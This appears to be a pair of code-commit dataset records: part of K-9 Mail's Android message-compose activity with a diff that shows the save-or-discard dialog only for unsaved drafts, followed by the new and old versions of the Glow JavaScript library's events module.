versions of the // platform. showDialog(DIALOG_SAVE_OR_DISCARD_DRAFT_MESSAGE); } @Override public Dialog onCreateDialog(int id) { switch (id) { case DIALOG_SAVE_OR_DISCARD_DRAFT_MESSAGE: return new AlertDialog.Builder(this) .setTitle(R.string.save_or_discard_draft_message_dlg_title) .setMessage(R.string.save_or_discard_draft_message_instructions_fmt) .setPositiveButton(R.string.save_draft_action, new DialogInterface.OnClickListener() { public void onClick(DialogInterface dialog, int whichButton) { dismissDialog(1); onSave(); } }) .setNegativeButton(R.string.discard_action, new DialogInterface.OnClickListener() { public void onClick(DialogInterface dialog, int whichButton) { dismissDialog(1); onDiscard(); } }) .create(); } return super.onCreateDialog(id); } @Override public boolean onKeyDown(int keyCode, KeyEvent event) { if ( // TODO - when we move to android 2.0, uncomment this. // android.os.Build.VERSION.SDK_INT < android.os.Build.VERSION_CODES.ECLAIR && keyCode == KeyEvent.KEYCODE_BACK && event.getRepeatCount() == 0 && K9.manageBack()) { // Take care of calling this method on earlier versions of // the platform where it doesn't exist. onBackPressed(); return true; } return super.onKeyDown(keyCode, event); } /** * Returns true if all attachments were able to be attached, otherwise returns false. */ private boolean loadAttachments(Part part, int depth) throws MessagingException { if (part.getBody() instanceof Multipart) { Multipart mp = (Multipart) part.getBody(); boolean ret = true; for (int i = 0, count = mp.getCount(); i < count; i++) { if (!loadAttachments(mp.getBodyPart(i), depth + 1)) { ret = false; } } return ret; } else { String contentType = MimeUtility.unfoldAndDecode(part.getContentType()); String name = MimeUtility.getHeaderParameter(contentType, "name"); if (name != null) { Body body = part.getBody(); if (body != null && body instanceof LocalAttachmentBody) { final Uri uri = ((LocalAttachmentBody) body).getContentUri(); mHandler.post(new Runnable() { public void run() { addAttachment(uri); } }); } else { return false; } } return true; } } /** * Pull out the parts of the now loaded source message and apply them to the new message * depending on the type of message being composed. * @param message */ private void processSourceMessage(Message message) { String action = getIntent().getAction(); if (ACTION_REPLY.equals(action) || ACTION_REPLY_ALL.equals(action)) { try { if (message.getSubject() != null && !message.getSubject().toLowerCase().startsWith("re:")) { mSubjectView.setText("Re: " + message.getSubject()); } else { mSubjectView.setText(message.getSubject()); } /* * If a reply-to was included with the message use that, otherwise use the from * or sender address. */ Address[] replyToAddresses; if (message.getReplyTo().length > 0) { addAddresses(mToView, replyToAddresses = message.getReplyTo()); } else { addAddresses(mToView, replyToAddresses = message.getFrom()); } if (message.getMessageId() != null && message.getMessageId().length() > 0) { String messageId = message.getMessageId(); mInReplyTo = messageId; if (message.getReferences() != null && message.getReferences().length > 0) { StringBuffer buffy = new StringBuffer(); for (int i=0; i < message.getReferences().length; i++) buffy.append(message.getReferences()[i]); mReferences = buffy.toString() + " " + mInReplyTo; } else { mReferences = mInReplyTo; } } else { if (K9.DEBUG) Log.d(K9.LOG_TAG, "could not get Message-ID."); } Part part = MimeUtility.findFirstPartByMimeType(mSourceMessage, "text/plain"); if (part != null || mSourceMessageBody != null) { String quotedText = String.format( getString(R.string.message_compose_reply_header_fmt), Address.toString(mSourceMessage.getFrom())); final String prefix = mAccount.getQuotePrefix(); // "$" and "\" in the quote prefix have to be escaped for // the replaceAll() invocation. final String escapedPrefix = prefix.replaceAll("(\\\\|\\$)", "\\\\$1"); if (mSourceMessageBody != null) { quotedText += mSourceMessageBody.replaceAll("(?m)^", escapedPrefix); } else { quotedText += MimeUtility.getTextFromPart(part).replaceAll( "(?m)^", escapedPrefix); } quotedText = quotedText.replaceAll("\\\r", ""); mQuotedText.setText(quotedText); mQuotedTextBar.setVisibility(View.VISIBLE); mQuotedText.setVisibility(View.VISIBLE); } if (ACTION_REPLY_ALL.equals(action) || ACTION_REPLY.equals(action)) { Identity useIdentity = null; for (Address address : message.getRecipients(RecipientType.TO)) { Identity identity = mAccount.findIdentity(address); if (identity != null) { useIdentity = identity; break; } } if (useIdentity == null) { if (message.getRecipients(RecipientType.CC).length > 0) { for (Address address : message.getRecipients(RecipientType.CC)) { Identity identity = mAccount.findIdentity(address); if (identity != null) { useIdentity = identity; break; } } } } if (useIdentity != null) { Identity defaultIdentity = mAccount.getIdentity(0); if (useIdentity != defaultIdentity) { switchToIdentity(useIdentity); } } } if (ACTION_REPLY_ALL.equals(action)) { for (Address address : message.getRecipients(RecipientType.TO)) { if (!mAccount.isAnIdentity(address)) { addAddress(mToView, address); } } if (message.getRecipients(RecipientType.CC).length > 0) { for (Address address : message.getRecipients(RecipientType.CC)) { if (!mAccount.isAnIdentity(address) && !Utility.arrayContains(replyToAddresses, address)) { addAddress(mCcView, address); } } mCcView.setVisibility(View.VISIBLE); } } } catch (MessagingException me) { /* * This really should not happen at this point but if it does it's okay. * The user can continue composing their message. */ } } else if (ACTION_FORWARD.equals(action)) { try { if (message.getSubject() != null && !message.getSubject().toLowerCase().startsWith("fwd:")) { mSubjectView.setText("Fwd: " + message.getSubject()); } else { mSubjectView.setText(message.getSubject()); } Part part = MimeUtility.findFirstPartByMimeType(message, "text/plain"); if (part == null) { part = MimeUtility.findFirstPartByMimeType(message, "text/html"); } if (part != null || mSourceMessageBody != null) { String quotedText = mSourceMessageBody; if (quotedText == null) { quotedText = MimeUtility.getTextFromPart(part); } if (quotedText != null) { String text = String.format( getString(R.string.message_compose_fwd_header_fmt), mSourceMessage.getSubject(), Address.toString(mSourceMessage.getFrom()), Address.toString( mSourceMessage.getRecipients(RecipientType.TO)), Address.toString( mSourceMessage.getRecipients(RecipientType.CC))); quotedText = quotedText.replaceAll("\\\r", ""); text += quotedText; mQuotedText.setText(text); mQuotedTextBar.setVisibility(View.VISIBLE); mQuotedText.setVisibility(View.VISIBLE); } } if (!mSourceMessageProcessed) { if (!loadAttachments(message, 0)) { mHandler.sendEmptyMessage(MSG_SKIPPED_ATTACHMENTS); } } } catch (MessagingException me) { /* * This really should not happen at this point but if it does it's okay. * The user can continue composing their message. */ } } else if (ACTION_EDIT_DRAFT.equals(action)) { try { mDraftUid = message.getUid(); mSubjectView.setText(message.getSubject()); addAddresses(mToView, message.getRecipients(RecipientType.TO)); if (message.getRecipients(RecipientType.CC).length > 0) { addAddresses(mCcView, message.getRecipients(RecipientType.CC)); mCcView.setVisibility(View.VISIBLE); } if (message.getRecipients(RecipientType.BCC).length > 0) { addAddresses(mBccView, message.getRecipients(RecipientType.BCC)); mBccView.setVisibility(View.VISIBLE); } // Read In-Reply-To header from draft final String[] inReplyTo = message.getHeader("In-Reply-To"); if ((inReplyTo != null) && (inReplyTo.length >= 1)) { mInReplyTo = inReplyTo[0]; } // Read References header from draft final String[] references = message.getHeader("References"); if ((references != null) && (references.length >= 1)) { mReferences = references[0]; } if (!mSourceMessageProcessed) { loadAttachments(message, 0); } Integer bodyLength = null; String[] k9identities = message.getHeader(K9.K9MAIL_IDENTITY); if (k9identities != null && k9identities.length > 0) { String k9identity = k9identities[0]; if (k9identity != null) { if (K9.DEBUG) Log.d(K9.LOG_TAG, "Got a saved identity: " + k9identity); StringTokenizer tokens = new StringTokenizer(k9identity, ":", false); String bodyLengthS = null; String name = null; String email = null; String signature = null; boolean signatureUse = message.getFolder().getAccount().getSignatureUse(); if (tokens.hasMoreTokens()) { bodyLengthS = Utility.base64Decode(tokens.nextToken()); try { bodyLength = Integer.parseInt(bodyLengthS); } catch (Exception e) { Log.e(K9.LOG_TAG, "Unable to parse bodyLength '" + bodyLengthS + "'"); } } if (tokens.hasMoreTokens()) { signatureUse = true; signature = Utility.base64Decode(tokens.nextToken()); } if (tokens.hasMoreTokens()) { name = Utility.base64Decode(tokens.nextToken()); } if (tokens.hasMoreTokens()) { email = Utility.base64Decode(tokens.nextToken()); } Identity newIdentity = new Identity(); newIdentity.setSignatureUse(signatureUse); if (signature != null) { newIdentity.setSignature(signature); mSignatureChanged = true; } else { newIdentity.setSignature(mIdentity.getSignature()); } if (name != null) { newIdentity.setName(name); mIdentityChanged = true; } else { newIdentity.setName(mIdentity.getName()); } if (email != null) { newIdentity.setEmail(email); mIdentityChanged = true; } else { newIdentity.setEmail(mIdentity.getEmail()); } mIdentity = newIdentity; updateSignature(); updateFrom(); } } Part part = MimeUtility.findFirstPartByMimeType(message, "text/plain"); if (part != null) { String text = MimeUtility.getTextFromPart(part); if (bodyLength != null && bodyLength + 1 < text.length()) // + 1 to get rid of the newline we added when saving the draft { String bodyText = text.substring(0, bodyLength); String quotedText = text.substring(bodyLength + 1, text.length()); mMessageContentView.setText(bodyText); mQuotedText.setText(quotedText); mQuotedTextBar.setVisibility(View.VISIBLE); mQuotedText.setVisibility(View.VISIBLE); } else { mMessageContentView.setText(text); } } } catch (MessagingException me) { // TODO } } mSourceMessageProcessed = true; mDraftNeedsSaving = false; } class Listener extends MessagingListener { @Override public void loadMessageForViewStarted(Account account, String folder, String uid) { if ((mMessageReference == null) || !mMessageReference.uid.equals(uid)) { return; } mHandler.sendEmptyMessage(MSG_PROGRESS_ON); } @Override public void loadMessageForViewFinished(Account account, String folder, String uid, Message message) { if ((mMessageReference == null) || !mMessageReference.uid.equals(uid)) { return; } mHandler.sendEmptyMessage(MSG_PROGRESS_OFF); } @Override public void loadMessageForViewBodyAvailable(Account account, String folder, String uid, final Message message) { if ((mMessageReference == null) || !mMessageReference.uid.equals(uid)) { return; } mSourceMessage = message; runOnUiThread(new Runnable() { public void run() { processSourceMessage(message); } }); } @Override public void loadMessageForViewFailed(Account account, String folder, String uid, Throwable t) { if ((mMessageReference == null) || !mMessageReference.uid.equals(uid)) { return; } mHandler.sendEmptyMessage(MSG_PROGRESS_OFF); // TODO show network error } @Override public void messageUidChanged(Account account, String folder, String oldUid, String newUid) { //TODO: is this really necessary here? mDraftUid is update after the call to MessagingController.saveDraft() // Track UID changes of the draft message if (account.equals(mAccount) && folder.equals(mAccount.getDraftsFolderName()) && oldUid.equals(mDraftUid)) { mDraftUid = newUid; } // Track UID changes of the source message if (mMessageReference != null) { final Account sourceAccount = Preferences.getPreferences(MessageCompose.this).getAccount(mMessageReference.accountUuid); final String sourceFolder = mMessageReference.folderName; final String sourceMessageUid = mMessageReference.uid; if (account.equals(sourceAccount) && (folder.equals(sourceFolder))) { if (oldUid.equals(sourceMessageUid)) { mMessageReference.uid = newUid; } if ((mSourceMessage != null) && (oldUid.equals(mSourceMessage.getUid()))) { mSourceMessage.setUid(newUid); } } } } } private String decode(String s) throws UnsupportedEncodingException { return URLDecoder.decode(s, "UTF-8"); } /** * When we are launched with an intent that includes a mailto: URI, we can actually * gather quite a few of our message fields from it. * * @mailToString the href (which must start with "mailto:"). */ private void initializeFromMailTo(String mailToString) { // Chop up everything between mailto: and ? to find recipients int index = mailToString.indexOf("?"); int length = "mailto".length() + 1; String to; try { // Extract the recipient after mailto: if (index == -1) { to = decode(mailToString.substring(length)); } else { to = decode(mailToString.substring(length, index)); } mToView.setText(to); } catch (UnsupportedEncodingException e) { Log.e(K9.LOG_TAG, e.getMessage() + " while decoding '" + mailToString + "'"); } // Extract the other parameters // We need to disguise this string as a URI in order to parse it Uri uri = Uri.parse("foo://" + mailToString); String addressList; addressList = ""; List<String> cc = uri.getQueryParameters("cc"); for (String address : cc) { addressList += address + ","; } mCcView.setText(addressList); addressList = ""; List<String> bcc = uri.getQueryParameters("bcc"); for (String address : bcc) { addressList += address + ","; } mBccView.setText(addressList); List<String> subject = uri.getQueryParameters("subject"); if (subject.size() > 0) { mSubjectView.setText(subject.get(0)); } List<String> body = uri.getQueryParameters("body"); if (body.size() > 0) { mMessageContentView.setText(body.get(0)); } } private class SendMessageTask extends AsyncTask<Void, Void, Void> { protected Void doInBackground(Void... params) { /* * Create the message from all the data the user has entered. */ MimeMessage message; try { message = createMessage(true); // Only append sig on save } catch (MessagingException me) { Log.e(K9.LOG_TAG, "Failed to create new message for send or save.", me); throw new RuntimeException("Failed to create a new message for send or save.", me); } MessagingController.getInstance(getApplication()).sendMessage(mAccount, message, null); if (mDraftUid != null) { MessagingController.getInstance(getApplication()).deleteDraft(mAccount, mDraftUid); mDraftUid = null; } return null; } } private class SaveMessageTask extends AsyncTask<Void, Void, Void> { protected Void doInBackground(Void... params) { /* * Create the message from all the data the user has entered. */ MimeMessage message; try { message = createMessage(false); // Only append sig on save } catch (MessagingException me) { Log.e(K9.LOG_TAG, "Failed to create new message for send or save.", me); throw new RuntimeException("Failed to create a new message for send or save.", me); } /* * Save a draft */ if (mDraftUid != null) { message.setUid(mDraftUid); } else if (ACTION_EDIT_DRAFT.equals(getIntent().getAction())) { /* * We're saving a previously saved draft, so update the new message's uid * to the old message's uid. */ message.setUid(mMessageReference.uid); } String k9identity = Utility.base64Encode("" + mMessageContentView.getText().toString().length()); if (mIdentityChanged || mSignatureChanged) { String signature = mSignatureView.getText().toString(); k9identity += ":" + Utility.base64Encode(signature); if (mIdentityChanged) { String name = mIdentity.getName(); String email = mIdentity.getEmail(); k9identity += ":" + Utility.base64Encode(name) + ":" + Utility.base64Encode(email); } } if (K9.DEBUG) Log.d(K9.LOG_TAG, "Saving identity: " + k9identity); message.addHeader(K9.K9MAIL_IDENTITY, k9identity); Message draftMessage = MessagingController.getInstance(getApplication()).saveDraft(mAccount, message); mDraftUid = draftMessage.getUid(); // Don't display the toast if the user is just changing the orientation if ((getChangingConfigurations() & ActivityInfo.CONFIG_ORIENTATION) == 0) { mHandler.sendEmptyMessage(MSG_SAVED_DRAFT); } return null; } } }
Only show "save or discard" dialog before leaving the message compose activity if the message needs saving.
src/com/fsck/k9/activity/MessageCompose.java
Only show "save or discard" dialog before leaving the message compose activity if the message needs saving.
<ide><path>rc/com/fsck/k9/activity/MessageCompose.java <ide> import android.view.View.OnFocusChangeListener; <ide> import android.view.Window; <ide> import android.widget.AutoCompleteTextView.Validator; <del>import android.widget.Button; <ide> import android.widget.CheckBox; <ide> import android.widget.EditText; <ide> import android.widget.ImageButton; <ide> return true; <ide> } <ide> <add> @Override <ide> public void onBackPressed() <ide> { <ide> // This will be called either automatically for you on 2.0 <ide> // or later, or by the code above on earlier versions of the <ide> // platform. <del> showDialog(DIALOG_SAVE_OR_DISCARD_DRAFT_MESSAGE); <add> if (mDraftNeedsSaving) <add> { <add> showDialog(DIALOG_SAVE_OR_DISCARD_DRAFT_MESSAGE); <add> } <add> else <add> { <add> finish(); <add> } <ide> } <ide> <ide> @Override <ide> <ide> private class SendMessageTask extends AsyncTask<Void, Void, Void> <ide> { <add> @Override <ide> protected Void doInBackground(Void... params) <ide> { <ide> /* <ide> <ide> private class SaveMessageTask extends AsyncTask<Void, Void, Void> <ide> { <add> @Override <ide> protected Void doInBackground(Void... params) <ide> { <ide>
JavaScript
apache-2.0
f5b2e25588ae99e24af8b5ae398a1ea02ba1160c
0
glow/glow2,glow/glow2
/** @name glow.events @namespace @description Native browser and custom events */ //----------------------------------------------------------------- Glow.provide({ version: '@SRC@', builder: function(glow) { glow.events = glow.events || {}; /* storage variables */ var r = {}; var eventListeners = {}; var eventid = 1; var objid = 1; var psuedoPrivateEventKey = '__eventId' + glow.UID; var psuedoPreventDefaultKey = psuedoPrivateEventKey + 'PreventDefault'; var psuedoStopPropagationKey = psuedoPrivateEventKey + 'StopPropagation'; /** @name glow.events.addListeners @function @param {Object[]} attachTo Array of objects to add listeners to @param {String} name Name of the event to listen for @param {Function} callback Function to call when the event fires. The callback is passed a single event object. The type of this object depends on the event (see documentation for the event you're listening to). @param {Object} [thisVal] Value of 'this' within the callback. By default, this is the object being listened to. @description Convenience method to add listeners to many objects at once. If you're wanting to add a listener to a single object, use its 'on' method. */ glow.events.addListeners = function (attachTo, name, callback, thisVal) { var listenerIds = [], i = attachTo.length, objIdent, listener, eventsOnObject, currentListeners; //attach the event for each element, return an array of listener ids while (i--) { objIdent = attachTo[i][psuedoPrivateEventKey]; if (!objIdent){ objIdent = attachTo[i][psuedoPrivateEventKey] = objid++; } listener = [ callback, thisVal || attachTo[i] ]; eventsOnObject = eventListeners[objIdent]; if(!eventsOnObject){ eventsOnObject = eventListeners[objIdent] = {}; } currentListeners = eventsOnObject[name]; if(!currentListeners){ currentListeners = eventsOnObject[name] = [listener]; } else{ currentListeners[currentListeners.length] = listener; } } }; /** @name glow.events.fire @function @param {Object[]} items Array of objects to add listeners to @param {String} eventName Name of the event to fire @param {glow.events.Event|Object} [event] Event object to pass into listeners. You can provide a simple object of key / value pairs which will be added as properties of a glow.events.Event instance. @description Convenience method to fire events on multiple items at once. If you're wanting to fire events on a single object, use its 'fire' method. */ glow.events.fire = function (items, eventName, event) { if (! event) { event = new glow.events.Event(); } else if ( event.constructor === Object ) { event = new glow.events.Event( event ) } for(var i = 0, len = items.length; i < len; i++){ callListeners(items[i], eventName, event); } return event; }; /** * Private method to callListeners * * */ function callListeners(item, eventName, event) { var objIdent = item[psuedoPrivateEventKey], listenersForEvent, returnVal; if(!objIdent){ return event; } if(!eventListeners[objIdent]){ return false; } listenersForEvent = eventListeners[objIdent][eventName]; if(!listenersForEvent){ return event; } listenersForEvent = listenersForEvent.slice(0); for(var i = 0, len = listenersForEvent.length; i < len; i++){ returnVal = listenersForEvent[i][0].call(listenersForEvent[i][1], event); if(returnVal === false){ event.preventDefault(); } } return event; } /** @name glow.events.removeAllListeners @function @param {Object[]} items Items to remove events from @description Removes all listeners attached to a given object. This removes not only listeners you added, but listeners others added too. For this reason it should only be used as part of a cleanup operation on objects that are about to be destroyed. Glow will call this by default on its own classes like NodeList and widgets. */ glow.events.removeAllListeners = function (items) { for(var i = 0, len = items.length; i < len; i++){ var objIdent = items[i][psuedoPrivateEventKey]; if(!objIdent){ return false; } else{ delete ( eventListeners[objIdent] ); } } return true; }; /** @name glow.events.removeListeners @function @param {Object[]} item Item to remove events from @decription Returns a list of events attached to the given item(s). widgets. */ glow.events.removeListeners = function (item, eventName, callback) { for(var i = 0, len = item.length; i < len; i++){ var objIdent = item[i][psuedoPrivateEventKey], listenersForEvent; if(!objIdent){ return false; } if(!eventListeners[objIdent]){ return false; } listenersForEvent = eventListeners[objIdent][eventName]; if(!listenersForEvent){ return false; } for(var i = 0, len = listenersForEvent.length; i < len; i++){ if(listenersForEvent[i][0] == callback){ listenersForEvent.splice(i, 1); break; } } } return true; }; /** @name glow.events.getListeners @function @param {Object[]} item Item to find events for @decription Removes listeners for given object, with the given name with the given thisVal. Glow will call this by default on its own classes like NodeList and widgets. */ glow.events.getListeners = function(item){ eventListeners; return false; }; /** @name glow.events.hasListener @function @param {Object[]} item Item to find events for @param {String} eventName Name of the event to match @decription Returns true if an event is found for the item supplied */ glow.events.hasListener = function (item, eventName) { for(var i = 0, len = item.length; i < len; i++){ var objIdent = item[i][psuedoPrivateEventKey], listenersForEvent; if(!objIdent){ return false; } if(!eventListeners[objIdent]){ return false; } listenersForEvent = eventListeners[objIdent][eventName]; if(!listenersForEvent){ return false; } else{ return true; } } return false; }; /** @name glow.events.Target @class @description An object that can have event listeners and fire events. This is a base class for objects that can fire events. You can extend this class to make your own objects have 'on' and 'fire' methods. @example // Ball is our constructor function Ball() { // ... } // make Ball inherit from Target glow.lang.extend(Ball, glow.events.Target, { // additional methods for Ball here, eg: bowl: function() { // ... } }); // now instances of Ball can receive event listeners var myBall = new Ball(); myBall.on('bounce', function() { alert('BOING!'); }); // and events can be fired from Ball instances myBall.fire('bounce'); */ glow.events.Target = function () { }; /** @name glow.events.Target.extend @function @param {Object} obj Object to add methods to @description Convenience method to add Target instance methods onto an object. If you want to add events to a class, extend glow.events.Target instead. @example // myApplication is a singleton var myApplication = {}; glow.events.Target.extend(myApplication); // now myApplication can fire events... myApplication.fire('load'); // and other objects can listen for those events myApplication.on('load', function(e) { alert('App loaded'); }); */ glow.events.Target.extend = function (obj) { glow.lang.apply( obj, glow.events.Target.prototype ); }; /** @name glow.events.Target#on @function @param {String} eventName Name of the event to listen for @param {Function} callback Function to call when the event fires. The callback is passed a single event object. The type of this object depends on the event (see documentation for the event you're listening to). @param {Object} [thisVal] Value of 'this' within the callback. By default, this is the object being listened to. @description Listen for an event @returns this @example myObj.on('show', function() { // do stuff }); */ glow.events.Target.prototype.on = function(eventName, callback, thisVal) { glow.events.addListeners([this], eventName, callback, thisVal); } /** @name glow.events.Target#detach @function @param {String} eventName Name of the event to listen for @param {Function} callback Callback to detach @param {Object} [thisVal] Value of 'this' within the callback. By default, this is the object being listened to. @description Remove an event listener @returns this @example function showListener() { // ... } // add listener myObj.on('show', showListener); // remove listener myObj.detach('show', showListener); @example // note the following WILL NOT WORK // add listener myObj.on('show', function() { alert('hi'); }); // remove listener myObj.detach('show', function() { alert('hi'); }); // this is because both callbacks are different function instances // YUI do it more like this: // add listener var listenerHandle = myObj.on('show', function() { alert('hi'); }); // remove listener listenerHandle.detach(); // the problem here is we lose chaining */ glow.events.Target.prototype.detach = function(eventName, callback) { glow.events.removeListeners(this, eventName, callback); } /** @name glow.events.Target#fire @function @param {String} eventName Name of the event to fire @param {glow.events.Event|Object} [event] Event object to pass into listeners. You can provide a simple object of key / value pairs which will be added as properties of a glow.events.Event instance. @description Fire an event @returns glow.events.Event @example myObj.fire('show'); @example // adding properties to the event object myBall.fire('bounce', { velocity: 30 }); @example // BallBounceEvent extends glow.events.Event but has extra methods myBall.fire( 'bounce', new BallBounceEvent(myBall) ); */ glow.events.Target.prototype.fire = function(eventName, event) { return callListeners(this, eventName, event); } /** @name glow.events.Event @class @param {Object} [properties] Properties to add to the Event instance. Each key-value pair in the object will be added to the Event as properties @description Describes an event that occurred You don't need to create instances of this class if you're simply listening to events. One will be provided as the first argument in your callback. @example // creating a simple event object var event = new glow.events.Event({ velocity: 50, direction: 180 }); // 'velocity' and 'direction' are simple made-up properties // you may want to add to your event object @example // inheriting from glow.events.Event to make a more // specialised event object function RocketEvent() { // ... } // inherit from glow.events.Event glow.lang.extend(RocketEvent, glow.events.Event, { getVector: function() { return // ... } }); // firing the event rocketInstance.fire( 'landingGearDown', new RocketEvent() ); // how a user would listen to the event rocketInstance.on('landingGearDown', function(rocketEvent) { var vector = rocketEvent.getVector(); }); */ glow.events.Event = function ( obj ) { if(obj) { glow.lang.apply(this, obj); } }; /** @name glow.events.Event#attachedTo @type {Object} @description The object the listener was attached to. If null, this value will be populated by {@link glow.events.Target#fire} */ /** @name glow.events.Event#source @type Element @description The actual object/element that the event originated from. For example, you could attach a listener to an 'ol' element to listen for clicks. If the user clicked on an 'li' the source property would be the 'li' element, and 'attachedTo' would be the 'ol'. */ /** @name glow.events.Event#preventDefault @function @description Prevent the default action of the event. Eg, if the click event on a link is cancelled, the link is not followed. Returning false from an event listener has the same effect as calling this function. For custom events, it's down to whatever fired the event to decide what to do in this case. See {@link glow.events.Event#defaultPrevented defaultPrevented} @example myLinks.on('click', function(event) { event.preventDefault(); }); // same as... myLinks.on('click', function(event) { return false; }); */ glow.events.Event.prototype.preventDefault = function () { if (this[psuedoPreventDefaultKey]) { return; } this[psuedoPreventDefaultKey] = true; if (this.nativeEvent && this.nativeEvent.preventDefault) { this.nativeEvent.preventDefault(); this.nativeEvent.returnValue = false; } }; /** @name glow.events.Event#defaultPrevented @function @description Has the default been prevented for this event? This should be used by whatever fires the event to determine if it should carry out of the default action. @returns {Boolean} Returns true if {@link glow.events.Event#preventDefault preventDefault} has been called for this event. @example // fire the 'show' event // read if the default action has been prevented if ( overlayInstance.fire('show').defaultPrevented() == false ) { // go ahead and show } */ glow.events.Event.prototype.defaultPrevented = function () { return !! this[psuedoPreventDefaultKey]; }; /** @name glow.events.Event#stopPropagation @function @description Stops the event propagating. For DOM events, this stops the event bubbling up through event listeners added to parent elements. The event object is marked as having had propagation stopped (see {@link glow.events.Event#propagationStopped propagationStopped}). @example // catch all click events that are not links glow.events.addListener( document, 'click', function () { alert('document clicked'); } ); glow.events.addListener( 'a', 'click', function (e) { e.stopPropagation(); } ); */ glow.events.Event.prototype.stopPropagation = function () { if (this[psuedoStopPropagationKey]) { return; } this[psuedoStopPropagationKey] = true; var e = this.nativeEvent; if (e) { e.cancelBubble = true; if (e.stopPropagation) { e.stopPropagation(); } } }; /** @name glow.events.Event#propagationStopped @function @description Tests if propagation has been stopped for this event. @returns {Boolean} True if event propagation has been prevented. */ glow.events.Event.prototype.propagationStopped = function () { return !! this[psuedoStopPropagationKey]; }; } });
src/events/events.js
/** @name glow.events @namespace @description Native browser and custom events */ //----------------------------------------------------------------- Glow.provide({ version: '@SRC@', builder: function(glow) { glow.events = glow.events || {}; /* storage variables */ var r = {}; var eventListeners = {}; var eventid = 1; var objid = 1; var psuedoPrivateEventKey = '__eventId' + glow.UID; var psuedoPreventDefaultKey = psuedoPrivateEventKey + 'PreventDefault'; var psuedoStopPropagationKey = psuedoPrivateEventKey + 'StopPropagation'; /** @name glow.events.addListeners @function @param {Object[]} attachTo Array of objects to add listeners to @param {String} name Name of the event to listen for @param {Function} callback Function to call when the event fires. The callback is passed a single event object. The type of this object depends on the event (see documentation for the event you're listening to). @param {Object} [thisVal] Value of 'this' within the callback. By default, this is the object being listened to. @description Convenience method to add listeners to many objects at once. If you're wanting to add a listener to a single object, use its 'on' method. */ glow.events.addListeners = function (attachTo, name, callback, thisVal) { var listenerIds = [], i = attachTo.length, objIdent, listener, eventsOnObject, currentListeners; //attach the event for each element, return an array of listener ids while (i--) { objIdent = attachTo[i][psuedoPrivateEventKey]; if (!objIdent){ objIdent = attachTo[i][psuedoPrivateEventKey] = objid++; } listener = [ callback, thisVal || attachTo[i] ]; eventsOnObject = eventListeners[objIdent]; if(!eventsOnObject){ eventsOnObject = eventListeners[objIdent] = {}; } currentListeners = eventsOnObject[name]; if(!currentListeners){ currentListeners = eventsOnObject[name] = [listener]; } else{ currentListeners[currentListeners.length] = listener; } } }; /** @name glow.events.fire @function @param {Object[]} items Array of objects to add listeners to @param {String} eventName Name of the event to fire @param {glow.events.Event|Object} [event] Event object to pass into listeners. You can provide a simple object of key / value pairs which will be added as properties of a glow.events.Event instance. @description Convenience method to fire events on multiple items at once. If you're wanting to fire events on a single object, use its 'fire' method. */ glow.events.fire = function (items, eventName, event) { if (! event) { event = new glow.events.Event(); } else if ( event.constructor === Object ) { event = new glow.events.Event( event ) } for(var i = 0, len = items.length; i < len; i++){ callListeners(items[i], eventName, event); } return event; }; /** * Private method to callListeners * * */ function callListeners(item, eventName, event) { var objIdent = item[psuedoPrivateEventKey], listenersForEvent, returnVal; if(!objIdent){ return event; } if(!eventListeners[objIdent]){ return false; } listenersForEvent = eventListeners[objIdent][eventName]; if(!listenersForEvent){ return event; } listenersForEvent = listenersForEvent.slice(0); for(var i = 0, len = listenersForEvent.length; i < len; i++){ returnVal = listenersForEvent[i][0].call(listenersForEvent[i][1], event); if(returnVal === false){ event.preventDefault(); } } return event; } /** @name glow.events.removeAllListeners @function @param {Object[]} items Items to remove events from @description Removes all listeners attached to a given object. This removes not only listeners you added, but listeners others added too. For this reason it should only be used as part of a cleanup operation on objects that are about to be destroyed. Glow will call this by default on its own classes like NodeList and widgets. */ glow.events.removeAllListeners = function (items) { for(var i = 0, len = items.length; i < len; i++){ var objIdent = items[i][psuedoPrivateEventKey]; if(!objIdent){ return false; } else{ delete ( eventListeners[objIdent] ); } } return true; }; /** @name glow.events.removeListeners @function @param {Object[]} item Item to remove events from @decription Returns a list of events attached to the given item(s). widgets. */ glow.events.removeListeners = function (item, eventName, callback) { for(var i = 0, len = item.length; i < len; i++){ var objIdent = item[i][psuedoPrivateEventKey], listenersForEvent; if(!objIdent){ return false; } if(!eventListeners[objIdent]){ return false; } listenersForEvent = eventListeners[objIdent][eventName]; if(!listenersForEvent){ return false; } for(var i = 0, len = listenersForEvent.length; i < len; i++){ if(listenersForEvent[i][0] == callback){ listenersForEvent.splice(i, 1); break; } } } return true; }; /** @name glow.events.getListeners @function @param {Object[]} item Item to find events for @decription Removes listeners for given object, with the given name with the given thisVal. Glow will call this by default on its own classes like NodeList and widgets. */ glow.events.getListeners = function(item){ eventListeners; return false; }; /** @name glow.events.hasListener @function @param {Object[]} item Item to find events for @param {String} eventName Name of the event to match @decription Returns true if an event is found for the item supplied */ glow.events.hasListener = function (item, eventName) { for(var i = 0, len = item.length; i < len; i++){ var objIdent = item[i][psuedoPrivateEventKey], listenersForEvent; if(!objIdent){ return false; } if(!eventListeners[objIdent]){ return false; } listenersForEvent = eventListeners[objIdent][eventName]; if(!listenersForEvent){ return false; } for(var i = 0, len = listenersForEvent.length; i < len; i++){ return true; } } return false; }; /** @name glow.events.Target @class @description An object that can have event listeners and fire events. This is a base class for objects that can fire events. You can extend this class to make your own objects have 'on' and 'fire' methods. @example // Ball is our constructor function Ball() { // ... } // make Ball inherit from Target glow.lang.extend(Ball, glow.events.Target, { // additional methods for Ball here, eg: bowl: function() { // ... } }); // now instances of Ball can receive event listeners var myBall = new Ball(); myBall.on('bounce', function() { alert('BOING!'); }); // and events can be fired from Ball instances myBall.fire('bounce'); */ glow.events.Target = function () { }; /** @name glow.events.Target.extend @function @param {Object} obj Object to add methods to @description Convenience method to add Target instance methods onto an object. If you want to add events to a class, extend glow.events.Target instead. @example // myApplication is a singleton var myApplication = {}; glow.events.Target.extend(myApplication); // now myApplication can fire events... myApplication.fire('load'); // and other objects can listen for those events myApplication.on('load', function(e) { alert('App loaded'); }); */ glow.events.Target.extend = function (obj) { glow.lang.apply( obj, glow.events.Target.prototype ); }; /** @name glow.events.Target#on @function @param {String} eventName Name of the event to listen for @param {Function} callback Function to call when the event fires. The callback is passed a single event object. The type of this object depends on the event (see documentation for the event you're listening to). @param {Object} [thisVal] Value of 'this' within the callback. By default, this is the object being listened to. @description Listen for an event @returns this @example myObj.on('show', function() { // do stuff }); */ glow.events.Target.prototype.on = function(eventName, callback, thisVal) { glow.events.addListeners([this], eventName, callback, thisVal); } /** @name glow.events.Target#detach @function @param {String} eventName Name of the event to listen for @param {Function} callback Callback to detach @param {Object} [thisVal] Value of 'this' 